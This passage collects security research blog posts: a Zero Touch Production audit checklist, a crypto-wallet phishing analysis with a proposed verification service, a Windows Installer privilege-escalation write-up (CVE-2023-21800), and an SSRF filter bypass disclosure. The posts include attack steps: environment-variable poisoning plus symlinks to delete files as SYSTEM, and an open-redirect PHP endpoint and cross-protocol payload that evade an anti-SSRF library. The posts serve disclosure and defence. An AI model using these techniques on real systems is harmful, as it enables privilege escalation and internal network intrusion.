Proper rate-limiting configuration is essential to ensure an attacker cannot change all production “at once” by themselves. The rate limiting configuration should be agreed upon with the team responsible for the mediated services.

G. ACL Ownership

Another pitfall is found in what provides the ownership or permission logic for the services. If SREs can edit membership data via the same ZTP service or via other means, an attacker can do the same and bypass the solution entirely.

H. Command Safeguards

Strict allowlists of parameters and configurations should be defined for commands or jobs that can be run. Similar to “living off the land binaries” (lolbins), if arguments to these commands are not properly vetted, there’s an increased risk of abuse.

I. Traceability and Scoping

A reason for the pushed command must always be requested by the user (who, when, what, WHY). Ensuring traceability and scoping in the ZTP platform helps maintain a clear understanding of actions taken and their justifications.

J. Scoped Access

The ZTP platform should have rules in place to detect not only if the user is authorized to access user data, but also which kind and at what scale. Lack of fine-grained authorization or scoping rules for querying user data increases the risk of abuse.

K. Different Interfaces, Different Requirements

ZTP platforms usually have two types of proxy interfaces: Remote Procedure Call (RPC) and Command Line Interface (CLI). The RPC proxy is used to run CLI on behalf of the user/service in production in a controlled way. Since the implementation varies between the two interfaces, looking for discrepancies in the access requirements or logic is crucial.

L. Service vs Global rules

The rule evaluation priority (Global over Service-specific) is another area of concern. In general, service rules should not be able to override global rules but only set stricter requirements.

M. Command Parsing

If an allowlist is enforced, inspect how the command is parsed when an allowlist is created (abstract syntax tree (AST), regex, binary match, etc.).

N. Race Conditions

All operations should be queued, and a global queue for the commands should be respected. There should be no chance of race conditions if two concurrent operations are issued.

O. Break-glass

In the ZTP pattern, a break-glass mechanism is always available for emergency response. Auditing this mode is essential. Entering it must be loud, justified, alert security, and be heavily logged. As an additional security measure, the breakglass mechanism for zero trust networking should be available only from specific locations. These locations are the organization’s panic rooms, specific locations with additional physical access controls to offset the increased trust placed in their connectivity.

Conclusions

As more companies develop and adopt Zero Touch Production platforms, it is crucial to understand and test these services for security vulnerabilities. With an increase in vendors and solutions for Zero Touch Production in the coming years, researching and staying informed about these platforms’ security issues is an excellent opportunity for security professionals.

References

Michał Czapiński and Rainer Wolafka from Google Switzerland, “Zero Touch Prod: Towards Safer and More Secure Production Environments”. USENIX (2019). Link / Talk ↩
Ward, Rory, and Betsy Beyer. “Beyondcorp: A new approach to enterprise security”, (2014). Link ↩
Adkins, Heather, et al. ““Building secure and reliable systems: best practices for designing, implementing, and maintaining systems”. O’Reilly Media, (2020). Link ↩

The Case For Improving Crypto Wallet Security

2023-03-28T00:00:00+02:00

Anatomy Of A Modern Day Crypto Scam

A large number of today’s crypto scams involve some sort of phishing attack, where the user is tricked into visiting a shady/malicious web site and connecting their wallet to it. The main goal is to trick the user into signing a transaction which will ultimately give the attacker control over the user’s tokens.

Usually, it all starts with a tweet or a post on some Telegram group or Slack channel, where a link is sent advertising either a new yield farming protocol boasting large APYs, or a new NFT project which just started minting. In order to interact with the web site, the user would need to connect their wallet and perform some confirmation or authorization steps.

Let’s take a look at the common NFT approve scam. The user is lead to the malicious NFT site, advertising a limited pre-mint of their new NFT collection. The user is then prompted to connect their wallet and sign a transaction, confirming the mint. However, for some reason, the transaction fails. The same happens on the next attempt. With each failed attempt, the user becomes more and more frustrated, believing the issue causes them to miss out on the mint. Their concentration and focus shifts slightly from paying attention to the transactions, to missing out on a great opportunity.

At this point, the phishing is in full swing. A few more failed attempts, and the victim bites.

(Image borrowed from How scammers manipulate Smart Contracts to steal and how to avoid it)

The final transaction, instead of the mint function, calls the setApprovalForAll, which essentially will give the malicious actor control over the user’s tokens. The user by this point is in a state where they blindly confirm transactions, hoping that the minting will not close.

Unfortunately, the last transaction is the one that goes through. Game over for the victim. All the attacker has to do now is act quickly and transfer the tokens away from the user’s wallet before the victim realizes what happened.

These type of attacks are really common today. A user stumbles on a link to a project offering new opportunities for profits, they connect their wallet, and mistakenly hand over their tokens to malicious actors. While a case can be made for user education, responsibility, and researching a project before interacting with it, we believe that software also has a big part to play.

The Case For Improving Crypto Wallet Security

Nobody can deny that the introduction of both blockchain-based technologies and Web3 have had a massive impact on the world. A lot of them have offered the following common set of features:

transfer of funds
permission-less currency exchange
decentralized governance
digital collectibles

Regardless of the tech-stack used to build these platforms, it’s ultimately the users who make the platform. This means that users need a way to interact with their platform of choice. Today, the most user-friendly way of interacting with blockchain-based platforms is by using a crypto wallet. In simple terms, a crypto wallet is a piece of software which facilitates signing of blockchain transactions using the user’s private key. There are multiple types of wallets including software, hardware, custodial, and non-custodial. For the purposes of this post, we will focus on software based wallets.

Before continuing, let’s take a short detour to Web2. In that world, we can say that platforms (also called services, portals or servers) are primarily built using TCP/IP based technologies. In order for users to be able to interact with them, they use a user-agent, also known as a web browser. With that said, we can make the following parallel to Web3:

Technology	Communication Protocol	User-Agent
Web2	HTTP/TLS	Web Browser
Web3	Blockchain JSON RPC	Crypto Wallet

Web browsers are arguably much, much more complex pieces of software compared to crypto wallets - and with good reason. As the Internet developed, people figured out how to put different media on it and web pages allowed for dynamic and scriptable content. Over time, advancements in HTML and CSS technologies changed what and how content could be shown on a single page. The Internet became a place where people went to socialize, find entertainment, and make purchases. Browsers needed to evolve, to support new technological advancements, which in turn increased complexity. As with all software, complexity is the enemy, and complexity is where bugs and vulnerabilities are born. Browsers needed to implement controls to help mitigate web-based vulnerabilities such as spoofing, XSS, and DNS rebinding while still helping to facilitate secure communication via encrypted TLS connections.

Next, lets see what a typical crypto wallet interaction for a normal user might look like.

The Current State Of Things In The Web3 World

Using a Web3 platform today usually means that a user is interacting with a web application (Dapp), which contains code to interact with the user’s wallet and smart contracts belonging to the platform. The steps in that communication flow generally look like:

1. Open the Dapp

In most cases, the user will navigate their web browser to a URL where the Dapp is hosted (ex. Uniswap). This will load the web page containing the Dapp’s code. Once loaded, the Dapp will try to connect to the user’s wallet.

2. Authorizing The Dapp

A few of the protections implemented by crypto wallets include requiring authorization before being able to access the user’s accounts and requests for transactions to be signed. This was not the case before EIP-1102. However, implementing these features helped keep users anonymous, stop Dapp spam, and provide a way for the user to manage trusted and un-trusted Dapp domains.

If all the previous steps were completed successfully, the user can start using the Dapp.

When the user decides to perform an action (make a transaction, buy an NFT, stake their tokens, etc.), the user’s wallet will display a popup, asking whether the user confirms the action. The transaction parameters are generated by the Dapp and forwarded to the wallet. If confirmed, the transaction will be signed and published to the blockchain, awaiting confirmation.

Besides the authorization popup when initially connecting to the Dapp, the user is not shown much additional information about the application or the platform. This ultimately burdens the user with verifying the legitimacy and trustworthiness of the Dapp and, unfortunately, this requires some degree of technical knowledge often out-of-reach for the majority of common users. While doing your own research, a common mantra of the Web3 world, is recommended, one misstep can lead to significant loss of funds.

That being said, let’s now take another detour to Web2 world, and see what a similar interaction looks like.

How Does The Web2 World Handle Similar Situations?

Like the previous example, we’ll look at what happens when a user wants to use a Web2 application. Let’s say that the user wants to check their email inbox. They’ll start by navigating their browser to the email domain (ex. Gmail). In the background, the browser performs a TLS handshake, trying to establish a secure connection to Gmail’s servers. This will enable an encrypted channel between the user’s browser and Gmail’s servers, eliminating the possibility of any eavesdropping. If the handshake is successful, an encrypted connection is established and communicated to the user through the browser’s UI.

The secure connection is based on certificates issued for the domain the user is trying to access. A certificate contains a public key used to establish the encrypted connection. Additionally, certificates must be signed by a trusted third-party called a Certificate Authority (CA), giving the issued certificate legitimacy and guaranteeing that it belongs to the domain being accessed.

But, what happens if that is not the case? What happens when the certificate is for some reason rejected by the browser? Well, in that case a massive red warning is shown, explaining what happened to the user.

Such warnings will be shown when a secure connection could not be established, the certificate of the host is not trusted or if the certificate is expired. The browser also tries to show, in a human-readable manner, as much useful information about the error as possible. At this point, it’s the choice of the user whether they trust the site and want to continue interacting with it. The task of the browser is to inform the user of potential issues.

What Can Be Done?

Crypto wallets should show the user as much information about the action being performed as possible. The user should see information about the domain/Dapp they are interacting with. Details about the actual transaction’s content, such as what function is being invoked and its parameters should be displayed in a user-readable fashion.

Comparing both previous examples, we can notice a lack of verification and information being displayed in crypto wallets today. This, then poses the question: what can be done? There exist a number of publicly available indicators for the health and legitimacy of a project. We believe communicating these to the user may be a good step forward in addressing this issue. Let’s go quickly go through them.

Proof Of Smart Contract Ownership

It is important to prove that a domain has ownership over the smart contracts with which it interacts. Currently, this mechanism doesn’t seem to exist. However, we think we have a good solution. Similarly to how Apple performs merchant domain verification, a simple JSON file or dapp_file can be used to verify ownership. The file can be stored on the root of the Dapp’s domain, on the path .well-known/dapp_file. The JSON file can contain the following information:

address of the smart contract the Dapp is interacting with
timestamp showing when the file was generated
signature of the content, verifying the validity of the file

At this point, a reader might say: “How does this show ownership of the contract?”. The key to that is the signature. Namely, the signature is generated by using the private key of the account which deployed the contract. The transparency of the blockchain can be used to get the deployer address, which can then be used to verify the signature (similarly to how Ethereum smart contracts verify signatures on-chain).

This mechanism enables creating an explicit association between a smart contract and the Dapp. The association can later be used to perform additional verification.

Domain Registration Records

When a new domain is purchased or registered, a public record is created in a public registrar, indicating the domain is owned by someone and is no longer available for purchase. The domain name is used by the Domain Name Service, or DNS, which translates it (ex www.doyensec.com) to a machine-friendly IP address (ex. 34.210.62.107).

The creation date of a DNS record shows when the Dapp’s domain was initially purchased. So, if a user is trying to interact with an already long established project and runs into a domain which claims to be that project with a recently created domain registration record, it may be a signal of possible fraudulent activities.

TLS Certificates

Creation and expiration dates of TLS certificates can be viewed in a similar fashion as DNS records. However, due to the short duration of certificates issued by services such as Let’s Encrypt, there is a strong chance that visitors of the Dapp will be shown a relatively new certificate.

TLS certificates, however, can be viewed as a way of verifying a correct web site setup where the owner took additional steps to allow secure communication between the user and their application.

Smart Contract Source Code Verification Status

Published and verified source code allows for audits of the smart contract’s functionality and can allow quick identification of malicious activity.

Smart Contract Deployment Date

The smart contract’s deployment date can provide additional information about the project. For example, if attackers set up a fake Uniswap web site, the likelihood of the malicious smart contract being recently deployed is high. If interacting with an already established, legitimate project, such a discrepancy should alarm the user of potential malicious activity.

Smart Contract Interactions

Trustworthiness of a project can be seen as a function of the number of interactions with that project’s smart contracts. A healthy project, with a large user base will likely have a large number of unique interactions with the project’s contracts. A small number of interactions, unique or not, suggest the opposite. While typical of a new project, it can also be an indicator of smart contracts set up to impersonate a legitimate project. Such smart contracts will not have the large user base of the original project, and thus the number of interactions with the project will be low.

Overall, a large number of unique interactions over a long period of time with a smart contract may be a powerful indicator of a project’s health and the health of its ecosystem.

Our Suggestion

While there are authorization steps implemented when a wallet is connecting to an unknown domain, we think there is space for improvement. The connection and transaction signing process can be further updated to show user-readable information about the domain/Dapp being accessed.

As a proof-of-concept, we implemented a simple web service https://github.com/doyensec/wallet-info. The service utilizes public information, such as domain registration records, TLS certificate information and data available via Etherscan’s API. The data is retrieved, validated, parsed and returned to the caller.

The service provides access to the following endpoints:

/host?url=<url>
/contract?address=<address>

The data these endpoints return can be integrated in crypto wallets at two points in the user’s interaction.

Initial Dapp Access

The /host endpoint can be used when the user is initially connecting to a Dapp. The Dapp’s URL should be passed as a parameter to the endpoint. The service will use the supplied URL to gather information about the web site and its configuration. Additionally, the service will check for the presence of the dapp_file on the site’s root and verify its signature. Once processing is finished, the service will respond with:

{
  
  "name": "Example Dapp",
  "timestamp": "2000-01-01T00:00:00Z",
  "domain": "app.example.com",
  "tls": true,
  "tls_issued_on": "2022-01-01T00:00:00Z",
  "tls_expires_on": "2022-01-01TT00:00:00Z",
  "dns_record_created": "2012-01-01T00:00:00Z",
  "dns_record_updated": "2022-08-14T00:01:31Z",
  "dns_record_expires": "2023-08-13T00:00:00Z",
  "dapp_file": true,
  "valid_signature": true
}

This information can be shown to the user in a dialog UI element, such as:

As a concrete example, lets take a look at this fake Uniswap site was active during the writing of this post. If a user tried to connect their wallet to the Dapp running on the site, the following information would be returned to the user:

{
  
  "name": null,
  "timestamp": null,
  "domain": "apply-uniswap.com",
  "tls": true,
  "tls_issued_on": "2023-02-06T22:37:19Z",
  "tls_expires_on": "2023-05-07T22:37:18Z",
  "dns_record_created": "2023-02-06T23:31:09Z",
  "dns_record_updated": "2023-02-06T23:31:10Z",
  "dns_record_expires": "2024-02-06T23:31:09Z",
  "dapp_file": false,
  "valid_signature": false
}

The missing information from the response reflect that the dapp_file was not found on this domain. This information will then be reflected on the UI, informing the user of potential issues with the Dapp:

At this point, the users can review the information and decide whether they feel comfortable giving the Dapp access to their wallet. Once the Dapp is authorized, this information doesn’t need to be shown anymore. Though, it would be beneficial to occasionally re-display this information, so that any changes in the Dapp or its domain will be communicated to the user.

Making A Transaction

Transactions can be split in two groups: transactions that transfer native tokens and transactions which are smart contract function calls. Based on the type of transaction being performed, the /contract endpoint can be used to retrieve information about the recipient of the transferred assets.

For our case, the smart contract function calls are the more interesting group of transactions. The wallet can retrieve information about both the smart contract on which the function will be called as well as the function parameter representing the recipient. For example the spender parameter in the approve(address spender, uint256 amount) function call. This information can be retrieved on a case-by-case basis, depending on the function call being performed.

Signatures of widely used functions are available and can be implemented in the wallet as a type of an allow or safe list. If a signature is unknown, the user should be informed about it.

Verifying the recipient gives users confidence they are transferring tokens, or allowing access to their tokens for known, legitimate addresses.

An example response for a given address will look something like:

{
  "is_contract": true,
  "contract_address": "0xF4134146AF2d511Dd5EA8cDB1C4AC88C57D60404",
  "contract_deployer": "0x002362c343061fef2b99d1a8f7c6aeafe54061af",
  "contract_deployed_on": "2023-01-01T00:00:00Z",
  "contract_tx_count": 10,
  "contract_unique_tx": 5,
  "valid_signature": true,
  "verified_source": false
}

In the background, the web service will gather information about the type of address (EOA or smart contract), code verification status, address interaction information etc. All of that should be shown to the user as part of the transaction confirmation step.

Links to the smart contract and any additional information can be provided here, helping users perform additional verification if they so wish.

In the case of native token transfers, the majority of verification consists of typing in the valid to address. This is not a task that is well suited for automatic verification. For this use case, wallets provide an “address book” like functionality, which should be utilized to minimize any user errors when initializing a transaction.

Conclusion

The point of this post is to highlight the shortcomings of today’s crypto wallet implementations, to present ideas, and make suggestions for how they can be improved. This field is actively being worked on. Recently, MetaMask updated their confirmation UI to display additional information, informing users of potential setApprovalForAll scams. This is a step in the right direction, but there is still a long way to go. Features like these can be built upon and augmented, to a point where users can make transactions and know, to a high level of certainty, that they are not making a mistake or being scammed.

There are also third-party groups like WalletGuard and ZenGo who have implemented similar verifications described in this post. These features should be a standard and required for every crypto wallet, and not just an additional piece of software that needs to be installed.

Like the user-agent of Web2, the web browser, user-agents of Web3 should do as much as possible to inform and protect their users.

Our implementation of the wallet-info web service is just an example of how public information can be pooled together. That information, combined with a good UI/UX design, will greatly improve the security of crypto wallets and, in turn, the security of the entire Web3 ecosystem.

Does Dapp verification completely solve the phishing/scam problem? Unfortunately, the answer is no. The proposed changes can help users in distinguishing between legitimate projects and potential scams, and guide them to make the right decision. Dedicated attackers, given enough time and funds, will always be able to produce a smart contract, Dapp or web site, which will look harmless using the indicators described above. This is true for both the Web2 and Web3 world.

Ultimately, it is up to the user to decide if the they feel comfortable giving their login credentials to a web site, or access to their crypto wallet to a Dapp. All software can do is point them in the right direction.

Windows Installer EOP (CVE-2023-21800)

2023-03-21T00:00:00+01:00

TL;DR: This blog post describes the details and methodology of our research targeting the Windows Installer (MSI) installation technology. If you’re only interested in the vulnerability itself, then jump right there

Introduction

Recently, I decided to research a single common aspect of many popular Windows applications - their MSI installer packages.

Not every application is distributed this way. Some applications implement custom bootstrapping mechanisms, some are just meant to be dropped on the disk. However, in a typical enterprise environment, some form of control over the installed packages is often desired. Using the MSI packages simplifies the installation process for any number of systems and also provides additional benefits such as automatic repair, easy patching, and compatibility with GPO. A good example is Google Chrome, which is typically distributed as a standalone executable, but an enterprise package is offered on a dedicated domain.

Another interesting aspect of enterprise environments is a need for strict control over employee accounts. In particular, in a well-secured Windows environment, the rule of least privileges ensures no administrative rights are given unless there’s a really good reason. This is bad news for malware or malicious attackers who would benefit from having additional privileges at hand.

During my research, I wanted to take a look at the security of popular MSI packages and understand whether they could be used by an attacker for any malicious purposes and, in particular, to elevate local privileges.

Typical installation

It’s very common for the MSI package to require administrative rights. As a result, running a malicious installer is a straightforward game-over. I wanted to look at legitimate, properly signed MSI packages. Asking someone to type an admin password, then somehow opening elevated cmd is also an option that I chose not to address in this blog post.

Let’s quickly look at how the installer files are generated. Turns out, there are several options to generate an MSI package. Some of the most popular ones are WiX Toolset, InstallShield, and Advanced Installer. The first one is free and open-source, but requires you to write dedicated XML files. The other two offer various sets of features, rich GUI interfaces, and customer support, but require an additional license. One could look for generic vulnerabilities in those products, however, it’s really hard to address all possible variations of offered features. On the other hand, it’s exactly where the actual bugs in the installation process might be introduced.

During the installation process, new files will be created. Some existing files might also be renamed or deleted. The access rights to various securable objects may be changed. The interesting question is what would happen if unexpected access rights are present. Would the installer fail or would it attempt to edit the permission lists? Most installers will also modify Windows registry keys, drop some shortcuts here and there, and finally log certain actions in the event log, database, or plain files.

The list of actions isn’t really sealed. The MSI packages may implement the so-called custom actions which are implemented in a dedicated DLL. If this is the case, it’s very reasonable to look for interesting bugs over there.

Once we have an installer package ready and installed, we can often observe a new copy being cached in the C:\Windows\Installers directory. This is a hidden system directory where unprivileged users cannot write. The copies of the MSI packages are renamed to random names matching the following regular expression: ^[0-9a-z]{7}\.msi$. The name will be unique for every machine and even every new installation. To identify a specific package, we can look at file properties (but it’s up to the MSI creator to decide which properties are configured), search the Windows registry, or ask the WMI:

$ Get-WmiObject -class Win32_Product | ? { $_.Name -like "*Chrome*" } | select IdentifyingNumber,Name

IdentifyingNumber                      Name
-----------------                      ----
{B460110D-ACBF-34F1-883C-CC985072AF9E} Google Chrome

Referring to the package via its GUID is our safest bet. However, different versions of the same product may still have different identifiers.

Assuming we’re using an unprivileged user account, is there anything interesting we can do with that knowledge?

Repair process

The builtin Windows tool, called msiexec.exe, is located in the System32 and SysWOW64 directories. It is used to manage the MSI packages. The tool is a core component of Windows with a long history of vulnerabilities. As a side note, I also happen to have found one such issue in the past (CVE-2021-26415). The documented list of its options can be found on the MSDN page although some additional undocumented switches are also implemented.

The flags worth highlighting are:

/l*vx to log any additional details and search for interesting events
/qn to hide any UI interactions. This is extremely useful when attempting to develop an automated exploit. On the other hand, potential errors will result in new message boxes. Until the message is accepted, the process does not continue and can be frozen in an unexpected state. We might be able to modify some existing files before the original access rights are reintroduced.

The repair options section lists flags we could use to trigger the repair actions. These actions would ensure the bad files are removed, and good files are reinstalled instead. The definition of bad is something we control, i.e., we can force the reinstallation of all files, all registry entries, or, say, only those with an invalid checksum.

Parameter	Description
`/fp`	Repairs the package if a file is missing.
`/fo`	Repairs the package if a file is missing, or if an older version is installed.
`/fe`	Repairs the package if file is missing, or if an equal or older version is installed.
`/fd`	Repairs the package if file is missing, or if a different version is installed.
`/fc`	Repairs the package if file is missing, or if checksum does not match the calculated value.
`/fa`	Forces all files to be reinstalled.
`/fu`	Repairs all the required user-specific registry entries.
`/fm`	Repairs all the required computer-specific registry entries.
`/fs`	Repairs all existing shortcuts.
`/fv`	Runs from source and re-caches the local package.

Most of the msiexec actions will require elevation. We cannot install or uninstall arbitrary packages (unless of course the system is badly misconfigured). However, the repair option might be an interesting exception! It might be, because not every package will work like this, but it’s not hard to find one that will. For these, the msiexec will auto-elevate to perform necessary actions as a SYSTEM user. Interestingly enough, some actions will be still performed using our unprivileged account making the case even more noteworthy.

The impersonation of our account will happen for various security reasons. Only some actions can be impersonated, though. If you’re seeing a file renamed by the SYSTEM user, it’s always going to be a fully privileged action. On the other hand, when analyzing who exactly writes to a given file, we need to look at how the file handle was opened in the first place.

We can use tools such as Process Monitor to observe all these events. To filter out the noise, I would recommend using the settings shown below. It’s possible to miss something interesting, e.g., a child processes’ actions, but it’s unrealistic to dig into every single event at once. Also, I’m intentionally disabling registry activity tracking, but occasionally it’s worth reenabling this to see if certain actions aren’t controlled by editable registry keys.

Another trick I’d recommend is to highlight the distinction between impersonated and non-impersonated operations. I prefer to highlight anything that isn’t explicitly impersonated, but you may prefer to reverse the logic.

Then, to start analyzing the events of the aforementioned Google Chrome installer, one could run the following command:

msiexec.exe /fa '{B460110D-ACBF-34F1-883C-CC985072AF9E}'

The stream of events should be captured by ProcMon but to look for issues, we need to understand what can be considered an issue. In short, any action on a securable object that we can somehow modify is interesting. SYSTEM writes a file we control? That’s our target.

Typically, we cannot directly control the affected path. However, we can replace the original file with a symlink. Regular symlinks are likely not available for unprivileged users, but we may use some tricks and tools to reinvent the functionality on Windows.

Windows EoP primitives

Although we’re not trying to pop a shell out of every located vulnerability, it’s interesting to educate the readers on what would be possible given some of the Elevation of Privilege primitives.

With an arbitrary file creation vulnerability we could attack the system by creating a DLL that one of the system processes would load. It’s slightly harder, but not impossible, to locate a Windows process that loads our planted DLL without rebooting the entire system.

Having an arbitrary file creation vulnerability but with no control over the content, our chances to pop a shell are drastically reduced. We can still make Windows inoperable, though.

With an arbitrary file delete vulnerability we can at least break the operating system. Often though, we can also turn this into an arbitrary folder delete and use the sophisticated method discovered by Abdelhamid Naceri to actually pop a shell.

The list of possible primitives is long and fascinating. A single EoP primitive should be treated as a serious security issue, nevertheless.

One vulnerability to rule them all (CVE-2023-21800)

I’ve observed the same interesting behavior in numerous tested MSI packages. The packages were created by different MSI creators using different types of resources and basically had nothing in common. Yet, they were all following the same pattern. Namely, the environment variables set by the unprivileged user were also used in the context of the SYSTEM user invoked by the repair operation.

Although I initially thought that the applications were incorrectly trusting some environment variables, it turned out that the Windows Installer’s rollback mechanism was responsible for the insecure actions.

7-zip

7-Zip provides dedicated Windows Installers which are published on the project page. The following file was tested:

Filename	Version
7z2201-x64.msi	22.01

To better understand the problem, we can study the source code of the application. The installer, defined in the DOC/7zip.wxs file, refers to the ProgramMenuFolder identifier.

     <Directory Id="ProgramMenuFolder" Name="PMenu" LongName="Programs">
        <Directory Id="PMenu" Name="7zip" LongName="7-Zip" />
      </Directory>
      ...
     <Component Id="Help" Guid="$(var.CompHelp)">
        <File Id="_7zip.chm" Name="7-zip.chm" DiskId="1" >
            <Shortcut Id="startmenuHelpShortcut" Directory="PMenu" Name="7zipHelp" LongName="7-Zip Help" />
        </File>
     </Component>

The ProgramMenuFolder is later used to store some components, such as a shortcut to the 7-zip.chm file.

As stated on the MSDN page:

The installer sets the ProgramMenuFolder property to the full path of the Program Menu folder for the current user. If an “All Users” profile exists and the ALLUSERS property is set, then this property is set to the folder in the “All Users” profile.

In other words, the property will either point to the directory controlled by the current user (in %APPDATA% as in the previous example), or to the directory associated with the “All Users” profile.

While the first configuration does not require additional explanation, the second configuration is tricky. The C:\ProgramData\Microsoft\Windows\Start Menu\Programs path is typically used while C:\ProgramData is writable even by unprivileged users. The C:\ProgramData\Microsoft path is properly locked down. This leaves us with a secure default.

However, the user invoking the repair process may intentionally modify (i.e., poison) the PROGRAMDATA environment variable and thus redirect the “All Users” profile to the arbitrary location which is writable by the user. The setx command can be used for that. It modifies variables associated with the current user but it’s important to emphasize that only the future sessions are affected. A completely new cmd.exe instance should be started to inherit the new settings.

Instead of placing legitimate files, a symlink to an arbitrary file can be placed in the %PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\7-zip\ directory as one of the expected files. As a result, the repair operation will:

Remove the arbitrary file (using the SYSTEM privileges)
Attempt to restore the original file (using an unprivileged user account)

The second action will fail, resulting in an Arbitrary File Delete primitive. This can be observed on the following capture, assuming we’re targeting the previously created C:\Windows\System32\__doyensec.txt file. We intentionally created a symlink to the targeted file under the C:\FakeProgramData\Microsoft\Windows\Start Menu\Programs\7-zip\7-Zip Help.lnk path.

Firstly, we can see the actions resulting in the REPARSE status. The file is briefly processed (or rather its attributes are), and the SetRenameInformationFile is called on it. The rename part is slightly misleading. What is actually happening is that file is moved to a different location. This is how the Windows installer creates rollback instructions in case something goes wrong. As stated before, the SetRenameInformationFile doesn’t work on the file handle level and cannot be impersonated. This action runs with the full SYSTEM privileges.

Later on, we can spot attempts to restore the original file, but using an impersonated token. These actions result in ACCESS DENIED errors, therefore the targeted file remains deleted.

The same sequence was observed in numerous other installers. For instance, I worked with PuTTY’s maintainer on a possible workaround which was introduced in the 0.78 version. In that version, the elevated repair is allowed only if administrator credentials are provided. However, this isn’t functionally equal and has introduced some other issues. The 0.79 release should restore the old WiX configuration.

Redirection Guard

The issue was reported directly to Microsoft with all the above information and a dedicated exploit. Microsoft assigned CVE-2023-21800 identifier to it.

It was reproducible on the latest versions of Windows 10 and Windows 11. However, it was not bounty-eligible as the attack was already mitigated on the Windows 11 Developer Preview. The same mitigation has been enabled with the 2022-02-14 update.

In October 2022 Microsoft shipped a new feature called Redirection Guard on Windows 10 and Windows 11. The update introduced a new type of mitigation called ProcessRedirectionTrustPolicy and the corresponding PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY structure. If the mitigation is enabled for a given process, all processed junctions are additionally verified. The verification first checks if the filesystem junction was created by non-admin users and, if so, if the policy prevents following them. If the operation is prevented, the error 0xC00004BC is returned. The junctions created by admin users are explicitly allowed as having a higher trust-level label.

In the initial round, Redirection Guard was enabled for the print service. The 2022-02-14 update enabled the same mitigation on the msiexec process.

This can be observed in the following ProcMon capture:

The msiexec is one of a few applications that have this mitigation enforced by default. To check for yourself, use the following not-so-great code:

#include <windows.h>
#include <TlHelp32.h>
#include <cstdio>
#include <string>
#include <vector>
#include <memory>

using AutoHandle = std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)>;
using Proc = std::pair<std::wstring, AutoHandle>;

std::vector<Proc> getRunningProcesses() {
    std::vector<Proc> processes;

    std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)> snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle);

    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    Process32First(snapshot.get(), &pe32);

    do {
        auto h = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
        if (h) {
            processes.emplace_back(std::wstring(pe32.szExeFile), AutoHandle(h, &CloseHandle));
        }
    } while (Process32Next(snapshot.get(), &pe32));

    return processes;
}

int main() {
    auto runningProcesses = getRunningProcesses();

    PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY policy;

    for (auto& process : runningProcesses) {
        auto result = GetProcessMitigationPolicy(process.second.get(), ProcessRedirectionTrustPolicy, &policy, sizeof(policy));

        if (result && (policy.AuditRedirectionTrust | policy.EnforceRedirectionTrust | policy.Flags)) {
            printf("%ws:\n", process.first.c_str());
            printf("\tAuditRedirectionTrust: % d\n\tEnforceRedirectionTrust : % d\n\tFlags : % d\n", policy.AuditRedirectionTrust, policy.EnforceRedirectionTrust, policy.Flags);
        }
    }
}

The Redirection Guard should prevent an entire class of junction attacks and might significantly complicate local privilege escalation attacks. While it addresses the previously mentioned issue, it also addresses other types of installer bugs, such as when a privileged installer moves files from user-controlled directories.

Microsoft Disclosure Timeline

Status	Data
Vulnerability reported to Microsoft	9 Oct 2022
Vulnerability accepted	4 Nov 2022
Patch developed	10 Jan 2023
Patch released	14 Feb 2023

SSRF Cross Protocol Redirect Bypass

2023-03-16T00:00:00+01:00

Server Side Request Forgery (SSRF) is a fairly known vulnerability with established prevention methods. So imagine my surprise when I bypassed an SSRF mitigation during a routine retest. Even worse, I have bypassed a filter that we have recommended ourselves! I couldn’t let it slip and had to get to the bottom of the issue.

Introduction

Server Side Request Forgery is a vulnerability in which a malicious actor exploits a victim server to perform HTTP(S) requests on the attacker’s behalf. Since the server usually has access to the internal network, this attack is useful to bypass firewalls and IP whitelists to access hosts otherwise inaccessible to the attacker.

Request Library Vulnerability

SSRF attacks can be prevented with address filtering, assuming there are no filter bypasses. One of the classic SSRF filtering bypass techniques is a redirection attack. In these attacks, an attacker sets up a malicious webserver serving an endpoint redirecting to an internal address. The victim server properly allows sending a request to an external server, but then blindly follows a malicious redirection to an internal service.

None of above is new, of course. All of these techniques have been around for years and any reputable anti-SSRF library mitigates such risks. And yet, I have bypassed it.

Client’s code was a simple endpoint created for integration. During the original engagement there was no filtering at all. After our test the client has applied an anti-SSRF library ssrfFilter. For the research and code anonymity purposes, I have extracted the logic to a standalone NodeJS script:

const request = require('request');
const ssrfFilter = require('ssrf-req-filter');

let url = process.argv[2];
console.log("Testing", url);

request({
    uri: url,
    agent: ssrfFilter(url),
}, function (error, response, body) {
    console.error('error:', error);
    console.log('statusCode:', response && response.statusCode);
});

To verify a redirect bypasss I have created a simple webserver with an open-redirect endpoint in PHP and hosted it on the Internet using my test domain tellico.fun:

<?php header('Location: '.$_GET["target"]); ?>

Initial test demonstrates that the vulnerability is fixed:

$ node test-request.js "http://tellico.fun/redirect.php?target=http://localhost/test" 
Testing http://tellico.fun/redirect.php?target=http://localhost/test
error: Error: Call to 127.0.0.1 is blocked.

But then, I switched the protocol and suddenly I was able to access a localhost service again. Readers should look carefully at the payload, as the difference is minimal:

$ node test-request.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
error: null
statusCode: 200

What happened? The attacker server has redirected the request to another protocol - from HTTPS to HTTP. This is all it took to bypass the anti-SSRF protection.

Why is that? After some digging in the popular request library codebase, I have discovered the following lines in the lib/redirect.js file:

  // handle the case where we change protocol from https to http or vice versa
if (request.uri.protocol !== uriPrev.protocol) {
  delete request.agent
}

According to the code above, anytime the redirect causes a protocol switch, the request agent is deleted. Without this workaround, the client would fail anytime a server would cause a cross-protocol redirect. This is needed since the native NodeJs http(s).agent cannot be used with both protocols.

Unfortunately, such behavior also loses any event handling associated with the agent. Given, that the SSRF prevention is based on the agents’ createConnection event handler, this unexpected behavior affects the effectiveness of SSRF mitigation strategies in the request library.

Disclosure

This issue was disclosed to the maintainers on December 5th, 2022. Despite our best attempts, we have not yet received an acknowledgment. After the 90-days mark, we have decided to publish the full technical details as well as a public Github issue linked to a pull request for the fix. On March 14th, 2023, a CVE ID has been assigned to this vulnerability.

12/05/2022 - First disclosure to the maintainer
